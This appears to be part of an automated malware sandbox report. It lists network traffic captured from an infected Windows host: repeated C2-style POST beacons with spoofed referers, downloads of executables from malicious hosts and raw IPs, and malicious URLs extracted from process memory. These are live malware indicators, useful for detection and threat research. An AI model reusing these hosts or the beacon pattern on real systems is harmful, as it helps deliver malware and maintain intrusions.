                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wpjrovehat.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 295Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gemicjpf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 181Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kgdrt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pbwsr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 294Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tinpgbjvs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 137Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://trkju.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://affpnhtco.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 296Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://biuigjh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bbqijtelr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ergvrb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 110Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dcppl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 359Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gnleqagbe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 296Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ffijaqcca.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://edakogho.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 216Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ccihwcxvgc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 130Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vnhfrdnsx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 115Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nbajd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sehol.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 337Host: amogohuigotuli.at
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qquvonfakj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 226Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rqgjiitwa.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 346Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wkshgd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lpdsum.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 119Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pefdgmtoj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /stlr/maps.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.243.44.130
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://opjngj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 172Host: amogohuigotuli.at
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rbkjpfevn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: amogohuigotuli.at
                      Source: global trafficHTTP traffic detected: GET /install1.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unic11m.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xujjips.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 254Host: amogohuigotuli.at
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://luqilpnni.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 364Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://smurvjp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 312Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /install1.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pbysostxi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xggvos.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://upxogvba.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qjoorlrk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: amogohuigotuli.at
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tahqfcsy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 250Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tuosodl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 155Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /files/8584_1641133152_551.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mnrycwnvnv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 168Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lqhxjo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 297Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hhtdbo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 147Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pcfbatp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 132Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yytvtctaug.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 181Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lmpxg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nxxtbccl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uqmves.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 305Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xhxsjp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://skgfhxg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 307Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qlaiw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: amogohuigotuli.at
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qopqxs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 114Host: amogohuigotuli.at
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cqutypagk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 111Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ahkpouvwup.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 350Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gxtcaqi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 177Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hrsmjturj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 313Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jwmtctjvqt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 244Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://amqeeswq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /crp.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: f0616068.xsph.ru
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gnnwam.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 127Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hwgkv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: amogohuigotuli.at
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fleiunffw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 145Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: vk.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ouwak.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 315Host: amogohuigotuli.at
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gyuyyjn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: natribu.org
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sxetmnxgu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 326Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: natribu.org
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://whjllmlg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 266Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /files/2972_1641266367_4755.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jjrpdilcbv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: amogohuigotuli.at
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ersxoxafng.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://amogohuigotuli.at/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 423Host: amogohuigotuli.at
                      Source: C:\Windows\explorer.exeDNS query: name: bit.ly
                      Source: C:\Windows\explorer.exeDNS query: name: bitly.com
                      Source: C:\Windows\explorer.exeDNS query: name: bit.ly
                      Source: C:\Windows\explorer.exeDNS query: name: bit.ly
                      Source: global trafficTCP traffic: 192.168.2.5:49793 -> 185.7.214.171:8080
                      Source: global trafficTCP traffic: 192.168.2.5:49846 -> 86.107.197.138:38133
                      Source: unknownNetwork traffic detected: IP country count 12
                      Source: global trafficTCP traffic: 192.168.2.5:49813 -> 40.93.207.1:25
                      Source: 4187.exe, 0000002A.00000002.596141885.0000000002726000.00000004.00000001.sdmpString found in binary or memory: http://194.180.174.41/
                      Source: 4187.exe, 0000002A.00000002.553183370.0000000000AC8000.00000004.00000001.sdmp, 4187.exe, 0000002A.00000002.594868854.000000000271D000.00000004.00000001.sdmpString found in binary or memory: http://194.180.174.41/capibar
                      Source: 4187.exe, 0000002A.00000002.594868854.000000000271D000.00000004.00000001.sdmpString found in binary or memory: http://194.180.174.41/capibarC
                      Source: 4187.exe, 0000002A.00000002.553183370.0000000000AC8000.00000004.00000001.sdmpString found in binary or memory: http://194.180.174.53/capibar
                      Source: 4187.exe, 0000002A.00000002.594868854.000000000271D000.00000004.00000001.sdmpString found in binary or memory: http://194.180.174.53/capibar0
                      Source: 4187.exe, 0000002A.00000002.594868854.000000000271D000.00000004.00000001.sdmpString found in binary or memory: http://194219.236.148/
                      Source: 4187.exe, 0000002A.00000002.596141885.0000000002726000.00000004.00000001.sdmpString found in binary or memory: http://91.219.236.148/
                      Source: 4187.exe, 0000002A.00000002.553213817.0000000000ADD000.00000004.00000001.sdmp, 4187.exe, 0000002A.00000002.553183370.0000000000AC8000.00000004.00000001.sdmp, 4187.exe, 0000002A.00000002.594868854.000000000271D000.00000004.00000001.sdmpString found in binary or memory: http://91.219.236.148/capibar
                      Source: 4187.exe, 0000002A.00000002.596141885.0000000002726000.00000004.00000001.sdmpString found in binary or memory: http://91.219.236.148/capibarN
                      Source: 4187.exe, 0000002A.00000002.602443827.0000000002755000.00000004.00000001.sdmpString found in binary or memory: http://91.219.236.148/capibarg
                      Source: 4187.exe, 0000002A.00000002.594868854.000000000271D000.00000004.00000001.sdmpString found in binary or memory: http://91.219.236.148/capibarl
                      Source: 4187.exe, 0000002A.00000002.596141885.0000000002726000.00000004.00000001.sdmpString found in binary or memory: http://91.219.236.18/3
                      Source: 4187.exe, 0000002A.00000002.553183370.0000000000AC8000.00000004.00000001.sdmp, 4187.exe, 0000002A.00000002.594868854.000000000271D000.00000004.00000001.sdmpString found in binary or memory: http://91.219.236.18/capibar
                      Source: 4187.exe, 0000002A.00000002.594868854.000000000271D000.00000004.00000001.sdmpString found in binary or memory: http://91.219.236.18/capibarl
                      Source: svchost.exe, 00000004.00000002.594562074.0000020254C62000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: svchost.exe, 00000004.00000002.594562074.0000020254C62000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                      Source: CBA.exe, 00000021.00000002.614533187.00000000034B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                      Source: CBA.exe, 00000021.00000002.633551102.0000000003544000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
